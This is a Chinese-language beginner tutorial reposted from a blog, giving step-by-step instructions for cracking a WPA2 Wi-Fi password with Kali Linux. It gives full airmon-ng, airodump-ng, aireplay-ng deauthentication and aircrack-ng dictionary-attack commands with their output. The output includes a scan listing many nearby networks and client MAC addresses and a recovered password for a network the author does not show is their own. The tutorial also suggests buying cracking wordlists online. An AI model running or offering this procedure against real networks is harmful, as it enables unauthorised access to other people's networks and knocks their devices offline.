热门标签
热门文章
- 1(业务向) 数据分析知识 + 产品_流量权益业务产品数据分析
- 2好消息!数栈FlinkX技术团队将FlinkX开源项目同步推送到Gitee啦!_flink gitee
- 3计算机网络(自顶向下)第一章总结_在()网络中,不保留资源;会话的消息按需使用资源,因此,可能必须等待对通信链路
- 4【论文笔记】A Survey of Large Language Models in Medicine - Progress, Application, and Challenges
- 5一个台电脑绑定多个github账户_sign in with your brower
- 6git clone失败
- 7机器学习 KD树生成(matlab实现)_kd树matlab简单实现
- 8Win11安全中心无法打开怎么解决?
- 9JSON 格式说明_json格式
- 10详解数据结构之二叉树(二叉链,使用递归)
当前位置: article > 正文
小白教程--- kali(po解)WIFI密码 (图文教程)_如何用kali获取wifi密码
作者:繁依Fanyi0 | 2024-08-10 09:01:51
赞
踩
如何用kali获取wifi密码
kali学得好,牢饭少不了!!!
原理:
模拟WiFi的已连接设备,强制让其下线重连,获取其握手包,使用密码字典(宝丽)婆洁。
环境(准备工作):
无线网卡:RT3070L
第一行信息
- ┌──(root㉿kali)-[/home/kali]
- └─# lsusb
- Bus 002 Device 018: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
- Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
- Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
- Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
- Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
- Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
linux系统
- ┌──(root㉿kali)-[/home/kali]
- └─# head -n 1 /etc/issue
- Kali GNU/Linux Rolling \n \l
-
- ┌──(root㉿kali)-[/home/kali]
- └─# uname -a
- Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64 GNU/Linux
-
- ┌──(root㉿kali)-[/home/kali]
- └─# uname -r
- 6.5.0-kali3-amd64
操作步骤:
步骤1:网卡连接虚拟机系统
网卡连接前 lsusb 查看连接信息
- ┌──(root㉿kali)-[/home/kali]
- └─# lsusb
- Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
- Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
- Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
- Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
- Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
插上网卡后再次查看信息,确保网卡以连上
第一行就是连上的网卡
- ┌──(root㉿kali)-[/home/kali]
- └─# lsusb
- Bus 002 Device 019: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
- Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
- Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
- Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
- Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
- Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
步骤2:查看网卡是否识别
ifconfig -a如果出现 wlan0 则说明网卡已连接成功
- ┌──(root㉿kali)-[/home/kali]
- └─# ifconfig -a
- eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
- ether 00:0c:29:b2:db:62 txqueuelen 1000 (Ethernet)
- RX packets 15228 bytes 22181855 (21.1 MiB)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 1395 bytes 97861 (95.5 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
-
- lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
- inet 127.0.0.1 netmask 255.0.0.0
- inet6 ::1 prefixlen 128 scopeid 0x10<host>
- loop txqueuelen 1000 (Local Loopback)
- RX packets 884 bytes 44240 (43.2 KiB)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 884 bytes 44240 (43.2 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
-
- wlan0: flags=4098<BROADCAST,MULTICAST> mtu 1500
- ether 14:6b:9c:02:72:1a txqueuelen 1000 (Ethernet)
- RX packets 0 bytes 0 (0.0 B)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 0 bytes 0 (0.0 B)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
步骤3:开启网卡监控
airmon-ng start wlan0- ┌──(root㉿kali)-[/home/kali]
- └─# airmon-ng start wlan0
-
-
- PHY Interface Driver Chipset
-
- phy14 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070
- (mac80211 monitor mode vif enabled for [phy14]wlan0 on [phy14]wlan0mon)
- (mac80211 station mode vif disabled for [phy14]wlan0)
查看是否监控成功
ifconfig -a如果出现wlan0mon则说明监控成功
- ┌──(root㉿kali)-[/home/kali]
- └─# ifconfig -a
- eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
- ether 00:0c:29:b2:db:62 txqueuelen 1000 (Ethernet)
- RX packets 15228 bytes 22181855 (21.1 MiB)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 1395 bytes 97861 (95.5 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
-
- lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
- inet 127.0.0.1 netmask 255.0.0.0
- inet6 ::1 prefixlen 128 scopeid 0x10<host>
- loop txqueuelen 1000 (Local Loopback)
- RX packets 884 bytes 44240 (43.2 KiB)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 884 bytes 44240 (43.2 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
-
- wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
- unspec 14-6B-9C-02-72-1A-00-62-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
- RX packets 3281 bytes 559070 (545.9 KiB)
- RX errors 0 dropped 3281 overruns 0 frame 0
- TX packets 0 bytes 0 (0.0 B)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
步骤4:扫描附近WiFi
airodump-ng wlan0mon扫描结果如下 ,确定需要破解的WiFi
本文以TP-LINK_97A4为例
- CH 4 ][ Elapsed: 1 min ][ 2024-06-08 01:49
-
- BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
-
- 10:63:4B:30:FD:67 -33 30 0 0 12 270 WPA2 CCMP PSK MERCURY_FD67
- 16:D8:64:51:4F:EE -65 10 0 0 6 270 WPA2 CCMP PSK <length: 0>
- F4:2A:7D:38:D5:15 -66 2 0 0 6 270 WPA2 CCMP PSK TP-LINK_D502
- 14:D8:64:50:4F:EE -66 17 0 0 6 270 WPA2 CCMP PSK TP-LINK_4FEE
- C8:75:F4:69:54:92 -56 26 0 0 6 324 WPA2 CCMP PSK CMCC-3u4g
- 24:69:68:76:97:A4 -37 38 22 0 6 405 WPA2 CCMP PSK TP-LINK_97A4
- C0:A4:76:6A:05:EB -55 23 0 0 11 360 WPA2 CCMP PSK CMCC-gURM
- 70:AF:6A:8C:45:08 -65 3 2 0 11 130 WPA2 CCMP PSK 306
- D4:84:09:38:2C:A2 -64 21 1 0 11 270 WPA2 CCMP PSK MERCURY_2CA2
- 24:CF:24:CD:E9:27 -59 20 0 0 10 130 WPA2 CCMP PSK cpdd
- 80:8B:1F:98:B2:60 -50 10 0 0 5 270 WPA2 CCMP PSK 504
- A4:A9:30:FA:FB:E5 -57 31 10 0 4 130 WPA2 CCMP PSK Xiaomi_FBE4
- E0:EF:02:01:67:BD -46 33 6 0 1 360 WPA2 CCMP PSK 403*
- 80:6B:1F:00:26:23 -66 25 2 0 1 130 WPA2 CCMP PSK XJT-400M_2622
- C8:BF:4C:95:CB:CF -59 35 0 0 1 270 WPA2 CCMP PSK Xiaomi_43EF
-
- BSSID STATION PWR Rate Lost Frames Notes Probes
-
- 24:69:68:76:97:A4 F2:E6:18:8D:02:54 -40 0 - 6 0 1
- 24:69:68:76:97:A4 14:13:33:6C:12:9D -44 0 - 1 0 3 TP-LINK_97A4
- 24:69:68:76:97:A4 76:82:DA:61:E7:B9 -54 1e- 1e 0 31
- 80:8B:1F:98:B2:60 4A:A5:AA:BB:42:DD -62 0 - 1e 0 6
- A4:A9:30:FA:FB:E5 C2:58:EB:56:AA:4A -58 0 -24 0 2
- E0:EF:02:01:67:BD F4:D6:20:92:04:42 -44 2e- 1e 0 7
- 80:6B:1F:00:26:23 5C:D0:6E:DF:49:3A -58 0 - 1e 0 4
步骤5:命令行等待抓取握手包
airodump-ng -w ./GGX -c 6 --bssid 24:69:68:76:97:A4 wlan0mon -ignore-nefative-oneaa
c:指定信道,即步骤4扫描结果CH列内容
-w:指定抓去握手包的存放路径
–bssid:指定路由器的MAC,即步骤4扫描结果的第一列BSSID
需要更改两个参数,信道和地址,这两个参数分别是扫描wifi时确定要破解的wifi参数
抓取扫描结果,如下,当前WiFi有4台设备连接
- CH 6 ][ GPS *** No Fix! *** ][ Elapsed: 36 s ][ 2024-06-08 01:57
-
- BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
-
- 24:69:68:76:97:A4 -37 100 377 51 0 6 405 WPA2 CCMP PSK TP-LINK_97A4
-
- BSSID STATION PWR Rate Lost Frames Notes Probes
-
- 24:69:68:76:97:A4 14:13:33:6C:12:9D -34 0 - 1e 0 15 TP-LINK_97A4
- 24:69:68:76:97:A4 14:D1:69:11:A5:6C -46 1e- 6 0 32
- 24:69:68:76:97:A4 F2:E6:18:8D:02:54 -44 1e- 6 0 88
- 24:69:68:76:97:A4 76:82:DA:61:E7:B9 -48 1e- 1e 1 73
步骤6:抓取握手包
步骤5都界面不需要关闭,模拟期中一台设备,让其断线重连,抓取其握手包。
aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon-0:代表攻击次数,以5次为例
-a:指定路由器的MAC
-c:指定客户机的MAC
- └─# aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon
- 02:05:49 Waiting for beacon frame (BSSID: 24:69:68:76:97:A4) on channel 6
- 02:05:51 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [80|64 ACKs]
- 02:05:52 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [68|53 ACKs]
- 02:05:53 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [86|62 ACKs]
- 02:05:54 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [65|49 ACKs]
- 02:05:55 Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [67|39 ACKs]
步骤7:抓取握手包结果
回到步骤5打开的终端,如果出现handshake,则说明握手包抓取成功,
如果抓取失败,则模拟另外一台设备,重复步骤6
-
- CH 6 ][ GPS *** No Fix! *** ][ Elapsed: 3 mins ][ 2024-06-08 02:08 ][ WPA handshake: 24:69:68:76:97:A4
-
- BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
-
- 24:69:68:76:97:A4 -42 96 1745 1577 2 6 405 WPA2 CCMP PSK TP-LINK_97A4
-
- BSSID STATION PWR Rate Lost Frames Notes Probes
-
- 24:69:68:76:97:A4 B0:D5:9D:6E:BF:48 1 1e- 1e 0 17
- 24:69:68:76:97:A4 14:D1:69:11:A5:6C -52 0 - 6 0 8
- 24:69:68:76:97:A4 F2:E6:18:8D:02:54 -42 1e- 6 0 42
- 24:69:68:76:97:A4 14:13:33:6C:12:9D -28 11e- 5e 11 1437 EAPOL TP-LINK_97A4
- 24:69:68:76:97:A4 76:82:DA:61:E7:B9 -52 1e-11e 18 833
观察目录下是否生成文件
- ┌──(root㉿kali)-[/home/kali]
- └─# ls -l
- total 1519876
- -rw-r--r-- 1 root root 28 Jun 8 01:57 GGX-01.ivs
- -rw-r--r-- 1 root root 28 Jun 8 01:59 GGX-02.ivs
- -rw-r--r-- 1 root root 5572 Jun 8 02:06 GGX-03.ivs
步骤8:获取密码字典
此步骤非常重要,能否(婆洁)成功就看它了
可以通过某宝获取,或者是网络上搜索
一般购买无线网卡会赠送字典
步骤9:将密码字典拷贝至于握手包文件同一个路径
- ┌──(root㉿kali)-[/home/kali]
- └─# ls -l
- total 1519876
- -rw-r--r-- 1 root root 28 Jun 8 01:57 GGX-01.ivs
- -rw-r--r-- 1 root root 28 Jun 8 01:59 GGX-02.ivs
- -rw-r--r-- 1 root root 5572 Jun 8 02:06 GGX-03.ivs
- -rw------- 1 kali kali 16391 Jun 2 10:46 wordlist.TXT
步骤10:保利婆洁WiFi密码
aircrack-ng -w wordlist.TXT GGX-0*
wordlist.TXT 是字典
婆洁成功界面,密码越简单越容易被婆洁
KEY FOUND!后面的就是密码
- Aircrack-ng 1.7
-
- [00:00:02] 2039/2109 keys tested (1269.26 k/s)
-
- Time left: 0 seconds 96.68%
-
- KEY FOUND! [ 123456 ]
-
-
- Master Key : 97 77 C9 45 72 B4 90 9C 56 F7 22 AD F1 E0 8A DC
- E9 3F 7F 1D A1 D6 AE 79 89 D5 8A FE E1 95 FE 59
-
- Transient Key : 57 E3 41 E7 5A A3 C3 B2 30 09 17 7D 53 B1 60 BC
- 05 17 02 B5 3C 78 10 5E 79 3C 81 8D A2 5B 94 C4
- 08 1C DC EC 31 A2 32 6E 96 D9 C3 00 00 00 00 00
- 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-
- EAPOL HMAC : 1C 9E F6 0D 9D 16 92 37 0D 90 6E 9B D9 03 7F B8
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/957813
推荐阅读
相关标签
